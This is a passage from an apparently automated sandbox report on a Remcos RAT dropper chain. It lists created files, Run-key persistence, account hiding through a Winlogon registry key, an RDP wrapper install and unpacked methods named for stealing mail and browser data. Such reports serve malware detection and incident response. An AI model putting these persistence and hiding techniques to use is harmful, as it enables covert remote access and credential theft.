name=='sqlite_sequence';
                    Source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\5.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\5.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Local\Temp\5.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040D25B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,4_2_0040D25B
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_01
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1328:120:WilError_01
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-36FQQT
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_01
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Software\4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Exe4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Inj4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Remcos-36FQQT4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: ProductName4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: pf4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: origmsc4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: 0f4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: x(f4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: exepath4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: licence4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Administrator4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: User4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile written: C:\Program Files\Microsoft DN1\rdpwrap.ini
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Local\Temp\5.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDirectory created: C:\Program Files\Microsoft DN1
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dll
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
                    Source: Binary string: wntdll.pdbUGP source: xxTzyGLZx5.exe, 00000001.00000003.670539145.00000000149D0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000001.00000003.674258624.0000000014840000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdb source: xxTzyGLZx5.exe, 00000001.00000003.670539145.00000000149D0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000001.00000003.674258624.0000000014840000.00000004.00000001.sdmp
                    Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp
                    Source: Binary string: wuser32.pdb source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp
                    Source: Binary string: wuser32.pdbUGP source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp

                    Data Obfuscation:

                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeUnpacked PE file: 31.2.remcos.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeUnpacked PE file: 32.2.remcos.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeUnpacked PE file: 33.2.remcos.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\AppData\Local\Temp\5.exeUnpacked PE file: 40.2.5.exe.4970000.15.unpack
                    Source: C:\Users\user\AppData\Local\Temp\4.exeUnpacked PE file: 41.2.4.exe.2520000.4.unpack
                    .NET source code contains potential unpacker
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB2E85 push ecx; ret 1_2_6EDB2E98
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC6D57 push esp; retf 1_2_6EDC6D59
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00452248 push eax; ret 4_2_00452266
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004308E6 push ecx; ret 4_2_004308F9
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00451926 push ecx; ret 4_2_00451939
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405C49
                    Source: sqlite3.dll.39.drStatic PE information: section name: /4
                    Source: sqlite3.dll.39.drStatic PE information: section name: /19
                    Source: sqlite3.dll.39.drStatic PE information: section name: /35
                    Source: sqlite3.dll.39.drStatic PE information: section name: /51
                    Source: sqlite3.dll.39.drStatic PE information: section name: /63
                    Source: sqlite3.dll.39.drStatic PE information: section name: /77
                    Source: sqlite3.dll.39.drStatic PE information: section name: /89
                    Source: sqlite3.dll.39.drStatic PE information: section name: /102
                    Source: sqlite3.dll.39.drStatic PE information: section name: /113
                    Source: sqlite3.dll.39.drStatic PE information: section name: /124
                    Source: rem9090sta.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x7e1fd
                    Source: WindowsUpdate.exe.44.drStatic PE information: real checksum: 0x0 should be: 0xd409f
                    Source: remcos.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x7e1fd
                    Source: xxTzyGLZx5.exeStatic PE information: real checksum: 0x0 should be: 0xd6064
                    Source: bin.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x1f2c5
                    Source: sozz.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x28e4f
                    Source: sqlmap.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x28987
                    Source: 4.exe.35.drStatic PE information: real checksum: 0x0 should be: 0x91963
                    Source: dwn.exe.13.drStatic PE information: real checksum: 0xa45b should be: 0x249c41
                    Source: Droppertodownloa[1].exe.13.drStatic PE information: real checksum: 0xa45b should be: 0x249c41
                    Source: kqkz.dll.38.drStatic PE information: real checksum: 0x0 should be: 0x308b5
                    Source: rgsbzeog.dll.43.drStatic PE information: real checksum: 0x0 should be: 0x32e49
                    Source: rgsbzeog.dll.37.drStatic PE information: real checksum: 0x0 should be: 0x32e49
                    Source: Windows Update.exe.40.drStatic PE information: real checksum: 0x0 should be: 0xd409f
                    Source: 5.exe.35.drStatic PE information: real checksum: 0x0 should be: 0xd409f
                    Source: 21.exe.35.drStatic PE information: real checksum: 0x0 should be: 0xea499
                    Source: orwglwkinzb.dll.36.drStatic PE information: real checksum: 0x0 should be: 0x2d55f

                    Persistence and Installation Behavior:

                    Uses cmd line tools excessively to alter registry or file data
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile created: C:\Users\user\AppData\Local\Temp\bin.exe
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeFile created: C:\Users\user\AppData\Local\Temp\4.exe
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeFile created: C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                    Source: C:\Users\user\AppData\Local\Temp\5.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exe
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile created: C:\Users\user\AppData\Local\Temp\tmpG77.tmp (copy)
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile created: C:\Program Files\Microsoft DN1\sqlmap.dll
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile created: C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Droppertodownloa[1].exe
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile created: C:\Users\user\AppData\Local\Temp\nsuAEE7.tmp\kqkz.dll
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\sqlite3.dll
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeFile created: C:\Users\user\AppData\Local\Temp\5.exe
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\SQLite3_StdCall.dll
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile created: C:\Users\user\AppData\Local\Temp\nst9F76.tmp\orwglwkinzb.dll
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeFile created: C:\Users\user\AppData\Local\Temp\21.exe
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile created: C:\Users\user\AppData\Local\Temp\nsaAFFF.tmp\rgsbzeog.dll
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeFile created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Users\user\AppData\Local\Temp\5.exeFile created: C:\Users\user\AppData\Local\Temp\nslA5A0.tmp\rgsbzeog.dll
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile created: C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00405E28 ShellExecuteW,URLDownloadToFileW,4_2_00405E28

                    Boot Survival:

                    Creates multiple autostart registry keys
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run logsmustcome
                    Source: C:\Users\user\AppData\Local\Temp\4.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run itswell
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters
                    Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00416D71 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_00416D71

                    Hooking and other Techniques for Hiding and Protection:

                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile opened: C:\Users\user\AppData\Local\Temp\bin.exe:Zone.Identifier read attributes | delete
                    Contains functionality to hide user accounts
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: bin.exe, 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Hides user accounts
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList KFypzIk
                    Changes the view of files in windows explorer (hidden files and folders)
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: 4_2_0040CD53 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0040CD53
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
